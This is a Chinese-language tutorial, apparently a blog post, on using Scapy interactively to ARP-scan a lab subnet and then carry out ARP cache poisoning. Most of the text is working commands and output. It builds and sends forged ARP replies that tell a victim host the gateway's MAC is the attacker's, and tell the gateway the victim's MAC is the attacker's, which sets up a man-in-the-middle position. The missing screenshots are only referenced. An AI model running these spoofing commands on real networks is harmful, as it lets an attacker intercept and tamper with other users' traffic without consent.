Scapy交互式arp掃描與攻擊
1) 簡單實現:(復雜實現定義為方法別人可以自動實現獲取自己IP地址所在段或者直接定義循環IP地址)
>>arp2=srp(Ether(dst=‘FF:FF:FF:FF:FF:FF‘)/ARP(op=1,hwdst=‘00:00:00:00:00:00‘,pdst=‘192.168.80.0/24‘))
Begin emission:
***Finished to send 256 packets.
................................................^C(復雜實現定義什麽時候停止)
Received 51 packets, got 3 answers, remaining 253 packets>> print(arp2[0].show())
0000 Ether / ARP who has 192.168.80.1 says 192.168.80.250 ==> Ether / ARP is at 00:50:56:c0:00:08 says 192.168.80.1 / Padding
0001 Ether / ARP who has 192.168.80.2 says 192.168.80.250 ==> Ether / ARP is at 00:50:56:ef:49:1f says 192.168.80.2 / Padding
0002 Ether / ARP who has 192.168.80.251 says 192.168.80.250 ==> Ether / ARP is at 00:0c:29:21:fd:03 says 192.168.80.251 / Padding2) 拆開看數據包192.168.80.251的字段:
>> print(arp2[0].res[2][1].fields)(復雜實現查看字段自動提取)
{‘src‘: ‘00:0c:29:21:fd:03‘, ‘dst‘: ‘00:0c:29:e2:bb:15‘, ‘type‘: 2054}
>> print(arp2[0].res[2][1].show())(復雜實現查看字段自動提取)
###[ Ethernet ]###
dst= 00:0c:29:e2:bb:15
src= 00:0c:29:21:fd:03
type= 0x806
###[ ARP ]###
hwtype= 0x1
ptype= 0x800
hwlen= 6plen= 4
op= is-at
hwsrc= 00:0c:29:21:fd:03
psrc= 192.168.80.251
hwdst= 00:0c:29:e2:bb:15
pdst= 192.168.80.250
###[ Padding ]###
load= ‘\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00‘
None
2、ARP spoof(arp毒化)
1)毒化192.168.80.251主機(告訴它網關mac是攻擊者的mac地址):
192.168.80.1 mac地址為00:50:56:c0:00:08(網關)
192.168.80.250 mac地址為00:0c:29:e2:bb:15(攻擊者)
192.168.80.251 mac地址為00:0c:29:21:fd:03(被攻擊者)
>>arp3=(Ether(dst=‘00:0c:29:21:fd:03‘)/ARP(op=2,hwsrc=‘00:0c:29:e2:bb:15‘,hwdst=‘00:0c:29:21:fd:03‘,psrc=‘192.168.80.1‘,pdst=‘192.168.80.251‘))
>> arp3.show()
###[ Ethernet ]###
dst= 00:0c:29:21:fd:03
src= ‘00:0c:29:e2:bb:15‘
type= 0x806
###[ ARP ]###
hwtype= 0x1
ptype= 0x800
hwlen= 6
plen= 4
op= is-at
hwsrc= 00:0c:29:e2:bb:15
psrc= 192.168.80.1
hwdst= 00:0c:29:21:fd:03
pdst= 192.168.80.251
>>arp3=srp(Ether(dst=‘00:0c:29:21:fd:03‘)/ARP(op=2,hwsrc=‘00:0c:29:e2:bb:15‘,hwdst=‘00:0c:29:21:fd:03‘,psrc=‘192.168.80.1‘,pdst=‘192.168.80.251‘))
Begin emission:
Finished to send 1 packets.
....^C
Received 4 packets, got 0 answers, remaining 1 packets
由於arp為二層包只要目的mac正確就可以發送,192.168.80.251接收到arp回復報文只讀取 ARP報文中的hwsrc=‘‘00:0c:29:e2:bb:15‘與psrc=‘192.168.80.1‘放入自己arp緩存中。
截圖:
毒化前192.168.80.251 arp 緩存:
毒化後192.168.80.251 arp 緩存:
3) 毒化網關(告訴網關192.168.80.1主機192.168.80.251 mac地址為攻擊者mac):
>>arp4=(Ether(dst=‘00:50:56:c0:00:08‘)/ARP(op=2,hwsrc=‘00:0c:29:e2:bb:15‘,hwdst=‘00:50:56:c0:00:08‘,psrc=‘192.168.80.251‘,pdst=‘192.168.80.1‘))
>> arp4.show()
###[ Ethernet ]###
dst= 00:50:56:c0:00:08
src= 00:0c:29:e2:bb:15
type= 0x806
###[ ARP ]###
hwtype= 0x1
ptype= 0x800
hwlen= 6
plen= 4
op= is-at
hwsrc= 00:0c:29:e2:bb:15
psrc= 192.168.80.251
hwdst= 00:50:56:c0:00:08
pdst= 192.168.80.1>>arp4=srp(Ether(dst=‘00:50:56:c0:00:08‘)/ARP(op=2,hwsrc=‘00:0c:29:e2:bb:15‘,hwdst=‘00:50:56:c0:00:08‘,psrc=‘192.168.80.251‘,pdst=‘192.168.80.1‘))
Begin emission:
Finished to send 1 packets.
........^C
Received 8 packets, got 0 answers, remaining 1 packets
由於arp為二層包只要目的mac正確就可以發送,192.168.80.1接收到arp回復報文只讀取 ARP報文中的hwsrc=‘‘00:0c:29:e2:bb:15‘與psrc=‘192.168.80.251‘放入自己arp緩存中。
截圖:
毒化前192.168.80.1 arp 緩存:
毒化後192.168.80.1 arp 緩存:
Scapy交互式arp掃描與攻擊